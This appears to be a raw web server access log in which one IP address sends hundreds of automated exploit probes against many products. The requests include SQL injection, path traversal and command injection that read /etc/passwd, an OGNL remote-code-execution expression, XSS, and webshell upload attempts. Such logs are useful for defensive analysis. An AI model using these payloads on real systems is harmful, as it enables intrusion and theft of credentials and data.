195.164.49.69 - - [20/Oct/2024:15:17:01 +0000] POST /run HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:17:02 +0000] POST /forgot_password.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:17:03 +0000] POST /convert HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:17:04 +0000] GET /file/xDPBvL.txt HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:17:05 +0000] POST /auth/newpassword HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:17:06 +0000] POST /dfsms/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:17:07 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:15:17:08 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:15:17:09 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:15:17:10 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:17:11 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:17:12 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:15:17:13 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:17:14 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:17:15 +0000] POST /account/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:17:16 +0000] POST /opensis/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:17:17 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:17:19 +0000] POST /cgi-bin/libagent.cgi?type=J HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:17:19 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:17:20 +0000] GET /wp-admin/index.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:17:21 +0000] GET /?author=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:17:22 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:17:24 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:17:25 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
83.212.98.101 - - [20/Oct/2024:15:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:17:28 +0000] POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:17:29 +0000] GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:17:30 +0000] GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1 404 1150
195.164.49.69 - - [20/Oct/2024:15:17:32 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:17:33 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:17:44 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:17:46 +0000] POST /webtools/control/SOAPService HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:17:47 +0000] POST /RPC2_Login HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:17:48 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:17:49 +0000] POST /api/v1/login/oauth2/auth HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:17:50 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:17:52 +0000] PUT /cgi-bin/fID1l0.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:17:53 +0000] DELETE /cgi-bin/fID1l0.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:17:54 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:17:55 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:18:28 +0000] GET /modules/appagebuilder/config.xml HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:18:29 +0000] POST /modules/appagebuilder/apajax.php?rand=2100484822935 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:18:30 +0000] POST /modules/appagebuilder/apajax.php?rand=2878574550943 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:18:31 +0000] POST /modules/appagebuilder/apajax.php?rand=7022223266887 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:18:36 +0000] GET /vcac/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:18:37 +0000] GET /vcac/?original_uri=http://sdc.iopan.pl:80%2Fvcac HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:18:39 +0000] POST /admin/login.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:18:40 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:18:41 +0000] GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1 404 1153
195.164.49.69 - - [20/Oct/2024:15:18:43 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:18:48 +0000] POST /classes/Master.php?f=delete_item HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:18:48 +0000] GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:18:53 +0000] GET /ws-api/v2/users/me/details?token=02 HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:18:54 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:18:55 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:18:56 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:18:57 +0000] GET /index.php/user/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:18:59 +0000] POST /json/setup-restore.action HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:19:00 +0000] GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:19:01 +0000] GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:15:19:03 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:19:04 +0000] POST /enrollment/ajax.php?action=login HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:19:05 +0000] GET /enrollment/index.php?page=home HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:19:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:19:07 +0000] POST /jeecg-boot/jmreport/show HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:19:10 +0000] POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1 404 1148
195.164.49.69 - - [20/Oct/2024:15:19:10 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:15:19:12 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:15:19:13 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:15:19:14 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:19:15 +0000] POST /app/sys1.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:19:16 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:15:19:18 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:19:19 +0000] POST /cgi-bin/vitogate.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:19:20 +0000] POST /cgi-bin/vitogate.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:19:21 +0000] GET /api/login/unlockGetData HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:19:22 +0000] POST /api/login/ HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:19:24 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:19:25 +0000] POST /ajax/ticket_user_db.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:19:26 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:15:19:27 +0000] POST /wp-admin/admin-post.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:19:28 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:15:19:29 +0000] GET /streampipes-backend/api/v2/auth/settings HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:19:30 +0000] POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:15:19:31 +0000] GET /file=web_assets/../config.json HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:19:33 +0000] POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:15:19:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:19:35 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:19:37 +0000] POST /api/ HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:19:37 +0000] POST /as/wapi/vmp HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:19:38 +0000] POST /as/wapi/vmp HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:19:39 +0000] POST /webtools/control/main/ProgramExport HTTP/1.1 404 1121
- - - [20/Oct/2024:15:19:41 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:19:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:19:43 +0000] GET /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:19:45 +0000] POST /webtools/control/view/StatsSinceStart HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:15:19:46 +0000] GET /asispanel/ HTTP/1.1 404 1088
- - - [20/Oct/2024:15:19:50 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:19:52 +0000] PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:19:53 +0000] POST /api/v0/train HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:19:54 +0000] GET /wp-json/wp/v2/give_forms/ HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:15:19:56 +0000] GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:15:19:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:19:57 +0000] POST /tracking/client_1/get-resource HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:19:58 +0000] POST /tracking/client_1/read-instruction HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:20:10 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:15:20:11 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:15:20:12 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:15:20:13 +0000] GET /interface-data/books-init HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:20:15 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:20:16 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:20:18 +0000] POST /index.php?action=porte_plume_previsu HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:20:18 +0000] GET /vicidial/welcome.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:20:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:20:20 +0000] POST /login/userverify.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:20:21 +0000] POST /auth/createAdmin HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:20:28 +0000] GET /APJxSx HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:20:29 +0000] GET /heapdump HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:20:30 +0000] GET /actuator/heapdump HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:20:35 +0000] POST /dashboard/proc.php?type=login HTTP/1.1 404 1096
- - - [20/Oct/2024:15:20:38 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:20:39 +0000] POST /eps/api/resourceOperations/upload?token=3B284767A39CAAB0B27EC1F52FB56A1B HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:20:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:20:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:20:43 +0000] POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:20:44 +0000] POST /resource/help/sys/portal/dataxml.jsp HTTP/1.1 404 1126
83.212.98.101 - - [20/Oct/2024:15:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:20:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:20:46 +0000] POST /ocpu/library/base/R/do.call/json HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:20:47 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:20:48 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:15:20:49 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:20:50 +0000] GET /cas/js/lib/buttons/yI01v.jsp HTTP/1.1 404 1118
- - - [20/Oct/2024:15:20:51 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:20:52 +0000] GET /2nhtxcvSGJDvH9TZ8QpCdFIqTKf.txt HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:20:53 +0000] GET /api/system/deviceinfo HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:20:55 +0000] POST /service_transport/service.action HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:20:56 +0000] GET /ASjmc.txt HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:20:57 +0000] POST /cgi-bin/Maintain/date_config HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:20:58 +0000] POST /login/userverify.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:20:59 +0000] POST /zms/admin/index.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:21:00 +0000] POST /modules/cartabandonmentpro/upload.php HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:21:01 +0000] GET /modules/cartabandonmentpro/uploads/cacaccc.php.png HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:15:21:02 +0000] POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Y71K8J.jsp&fileId=2 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:21:03 +0000] GET /Y71K8J.jsp HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:21:04 +0000] POST /?s=index/index/index HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:21:05 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:21:06 +0000] GET /bodxokbiabc.php HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:21:08 +0000] POST /client.do HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:21:09 +0000] POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:21:10 +0000] POST /aim/equipmap/accept.jsp HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:21:11 +0000] GET /2nhtxccTZJtPDlnEYI7nwm8BTIV.jsp HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:21:12 +0000] POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:22:04 +0000] GET /tool/log/c.php?strip_slashes=printf&host=nl+c.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:22:06 +0000] GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1 404 1172
195.164.49.69 - - [20/Oct/2024:15:22:07 +0000] GET /console/login/LoginForm.jsp HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:22:08 +0000] GET /rest/users/1/settings/ HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:22:09 +0000] GET /+CSCOE+/session_password.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:22:10 +0000] GET /SetupWizard.aspx/KJOWmswjxR HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:22:12 +0000] GET /showfile.php?file=/etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:22:13 +0000] GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:22:15 +0000] GET /wp-json/h5vp/v1/video/0?id='+union+all+select+concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5(999999999)),2,3,4,5,6,7,8--+- HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:22:16 +0000] GET /pods HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:22:17 +0000] GET /api/v1/pods HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:22:18 +0000] GET /inventory HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:22:19 +0000] GET /ipython/tree HTTP/1.1 404 1090
- - - [20/Oct/2024:15:22:22 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:22:22 +0000] GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:22:23 +0000] GET /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:22:24 +0000] GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:15:22:25 +0000] GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1 400 1169
83.212.98.101 - - [20/Oct/2024:15:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:22:26 +0000] GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:22:27 +0000] GET /wp-admin/install.php?step=1 HTTP/1.1 404 1098
- - - [20/Oct/2024:15:22:28 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:22:29 +0000] POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:22:30 +0000] GET /prweb/PRAuth/app/default/ HTTP/1.1 404 1115
- - - [20/Oct/2024:15:22:32 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:22:32 +0000] GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:22:34 +0000] GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','999999999')),3,32)-- HTTP/1.1 404 1098
- - - [20/Oct/2024:15:22:35 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:22:36 +0000] GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:22:38 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:22:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:22:41 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:22:41 +0000] GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:22:42 +0000] GET /oam/server/opensso/sessionservice HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:22:43 +0000] GET /web_cste/cgi-bin/product.ini HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:22:44 +0000] GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:22:45 +0000] OPTIONS / HTTP/1.1 200 -
195.164.49.69 - - [20/Oct/2024:15:22:46 +0000] GET /current_config/passwd HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:22:47 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:22:48 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:22:49 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:22:50 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:22:51 +0000] GET /data/pbootcms.db HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:22:53 +0000] POST /cgi-bin/rpc HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:22:57 +0000] POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:22:59 +0000] POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:23:03 +0000] GET /cgi-bin/test.cgi HTTP/1.1 404 1094
